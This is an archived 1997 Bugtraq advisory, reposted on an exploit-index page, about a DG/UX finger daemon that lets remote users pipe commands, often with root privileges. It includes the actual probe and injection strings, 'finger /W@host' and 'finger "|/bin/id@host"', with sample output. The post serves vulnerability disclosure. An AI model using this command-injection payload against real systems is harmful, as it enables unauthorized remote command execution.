Apparently (and amazingly) current dgux ships with a finger daemon that allows remote users to pipe commands. IE you can 'finger "|/bin/id@host'. This is made worse because many of these systems apparently run in.fingerd as root (!).
Author:
George Imburgia <gti@HOPI.DTCC.EDU>
Compromise:
remotely run arbitrary programs with UID that is running in.fingerd. Sometimes this means you can remotely become root .
Vulnerable Systems:
dgux, versions unknown.
Date:
11 August 1997
Notes:
If this is true it is rather pathetic!
Details
Date: Mon, 11 Aug 1997 12:32:38 -0400
From: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: dgux in.fingerd vulnerability
Another old bug that won't die.
The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.
To check for this vulnerability, simply use the RFC compliant syntax;
finger /W@host
If it returns something like this, it may be vulnerable;
Login name: /W In real life: ???
To see the uid in.fingerd is running as, try this;
finger "|/bin/id@host"
Often, you will see something like this;
uid=0(root) gid=0(root)
or;
uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia =
= Network Specialist, Computer Services =
= Office of the President =
= Delaware Tech =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
More
Exploits!
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:
